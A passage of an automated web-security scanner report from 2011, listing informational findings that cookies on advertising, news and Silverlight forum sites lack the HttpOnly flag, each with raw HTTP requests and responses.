Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; session=1296350849|1296350983

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 171
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/


<img src="http://ib.adnxs.com/seg?add=81825&t=2" width="1" height="1" />

17.146. http://domdex.com/f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://domdex.com
Path:	/f

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

k=keyword+targeting%2Cpaid+inclusion%2Cpaid+placement%2Cppc%2Cpay+per+click%2Ccpc%2Cpay+for+placement%2Cpay+for+ranking%2Ckanoodle%2Cbid+for+location%2Ccost+per+click%2Cpay+for+performance%2Ctrusted+feed%2Cdeep+web%2Cinvisible+web%2Cxml+feed%2Csearch+engine+marketing%2Csearch%2Csearch+engine%2Csearch+engine+keyword+discovery%2Csponsored+links-163-1296399205.mass+texting-107-1296236614_; expires=Sat, 30-Apr-2011 14:53:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /f?c=163&k=keyword+targeting,paid+inclusion,paid+placement,ppc,pay+per+click,cpc,pay+for+placement,pay+for+ranking,kanoodle,bid+for+location,cost+per+click,pay+for+performance,trusted+feed,deep+web,invisible+web,xml+feed,search+engine+marketing,search,search+engine,search+engine+keyword+discovery,sponsored+links HTTP/1.1
Host: domdex.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dex=1; k=mass+texting-107-1296236614_

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, no-cache
Set-Cookie: k=keyword+targeting%2Cpaid+inclusion%2Cpaid+placement%2Cppc%2Cpay+per+click%2Ccpc%2Cpay+for+placement%2Cpay+for+ranking%2Ckanoodle%2Cbid+for+location%2Ccost+per+click%2Cpay+for+performance%2Ctrusted+feed%2Cdeep+web%2Cinvisible+web%2Cxml+feed%2Csearch+engine+marketing%2Csearch%2Csearch+engine%2Csearch+engine+keyword+discovery%2Csponsored+links-163-1296399205.mass+texting-107-1296236614_; expires=Sat, 30-Apr-2011 14:53:25 GMT
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0

17.147. http://earthsky.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://earthsky.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nollkmcj=4EAA623C76FDF55310FACF40BC17B580; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: earthsky.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.148. http://editorial.autos.redacted/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/article.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=809818d765004928b3863b73ae1a7281; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1E98BFEFC7AD4A61B8576A26797B1A16; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.149. http://editorial.autos.redacted/articles/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/articles/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=69ea214e2db949c1adb4b09535432079; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=768421AB2A474F75A2A0356E76F9A868; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /articles/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.150. http://editorial.autos.redacted/blogs/autosblog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/blogs/autosblog.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=f2055ff4949f4938b5733da1ed24544e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=30C61D772A2040BEA40CE77407721D63; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blogs/autosblog.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.151. http://editorial.autos.redacted/media/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/media/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=7f39811ff05647408c8faea3cdd2f40e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=7A4C72BC26CB4E3EB7E637ACF81B2D78; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:05 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.152. http://editorial.autos.redacted/media/video/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/media/video/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=1b6d9a1169d84117806825e1245e514d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=282B2494452D4EF08780001B5E10E010; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/video/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.153. http://editorial.autos.redacted/new-cars/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/new-cars/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=ff89ea3264c14793bcb0990ab84276b0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=F28B3EDBC5D6441D845D4C4460CEA484; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:02 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /new-cars/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.154. http://editorial.autos.redacted/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/slideshow.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=7b4a758c71c84b67bd5ca4184af69515; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=EE184531720E4743A15DC3BBC4F0985E; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:09 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /slideshow.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.155. http://editorial.autos.redacted/used-cars/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/used-cars/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=0f2992fc55e64374a8de46d105ca4355; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8E803F046F9B48FC80C03D86EE3DD45F; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /used-cars/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.156. http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://engine2.adzerk.net
Path:	/z/8277/adzerk1_2_4_43,adzerk2_2_17_45

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/8277/adzerk1_2_4_43,adzerk2_2_17_45?keywords=php,facebook,iframe,facebook-like HTTP/1.1
Host: engine2.adzerk.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 2200
Connection: keep-alive

function cssLoad(css){var s=document.createElement('style');document.getElementsByTagName('head')[0].appendChild(s);if(!!window.ActiveXObject){document.styleSheets[document.styleSheets.length-1].cssTe
...[SNIP]...

17.157. http://engine2.adzerk.net/z/8277/adzerk2_2_17_45 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://engine2.adzerk.net
Path:	/z/8277/adzerk2_2_17_45

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/8277/adzerk2_2_17_45 HTTP/1.1
Host: engine2.adzerk.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 15:11:30 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/
X-AspNet-Version: 2.0.50727
Content-Length: 1497
Connection: keep-alive

function cssLoad(css){var s=document.createElement('style');document.getElementsByTagName('head')[0].appendChild(s);if(!!window.ActiveXObject){document.styleSheets[document.styleSheets.length-1].cssTe
...[SNIP]...

17.158. http://entertainment.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=77a66bfe41db42d28e4f88077be1798b; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.159. http://entertainment.redacted/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/news/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=995146dbfad74c20970e903f13e0f1ce; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.160. http://entertainment.redacted/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/video/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=67f07d4e22dd45d1976d2b39e3c3771d; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.161. http://expression.microsoft.com/en-us/cc136530.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://expression.microsoft.com
Path:	/en-us/cc136530.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAAD4BwAAfetuS+xFfAxTn86aknonWg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:41:15 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/cc136530.aspx HTTP/1.1
Host: expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.162. http://forums.silverlight.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; expires=Sun, 29-Jan-2012 23:15:21 GMT; path=/
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; expires=Sun, 29-Jan-2012 23:15:21 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:35:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; expires=Sun, 29-Jan-2012 23:15:21 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; expires=Sun, 29-Jan-2012 23:15:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; path=/; HttpOnly
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:35:21 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:21 GMT
Content-Length: 62092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head id="ctl00_ctl00"
...[SNIP]...

17.163. http://forums.silverlight.net/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:48 GMT; expires=Sun, 29-Jan-2012 23:20:48 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 62169
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:48 GMT; expires=Sun, 29-Jan-2012 23:20:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head id="ctl00_ctl00"
...[SNIP]...

17.164. http://forums.silverlight.net/forums/13.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/13.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:21 GMT; expires=Sun, 29-Jan-2012 23:17:21 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/13.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72202
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:21 GMT; expires=Sun, 29-Jan-2012 23:17:21 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:21 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Instal
...[SNIP]...

17.165. http://forums.silverlight.net/forums/14.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/14.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:21 GMT; expires=Sun, 29-Jan-2012 23:17:21 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/14.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73488
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:21 GMT; expires=Sun, 29-Jan-2012 23:17:21 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:22 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Gettin
...[SNIP]...

17.166. http://forums.silverlight.net/forums/15.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/15.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:23 GMT; expires=Sun, 29-Jan-2012 23:17:23 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/15.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76271
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:23 GMT; expires=Sun, 29-Jan-2012 23:17:23 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:23 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Hostin
...[SNIP]...

17.167. http://forums.silverlight.net/forums/16.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/16.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:32 GMT; expires=Sun, 29-Jan-2012 23:17:32 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/16.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
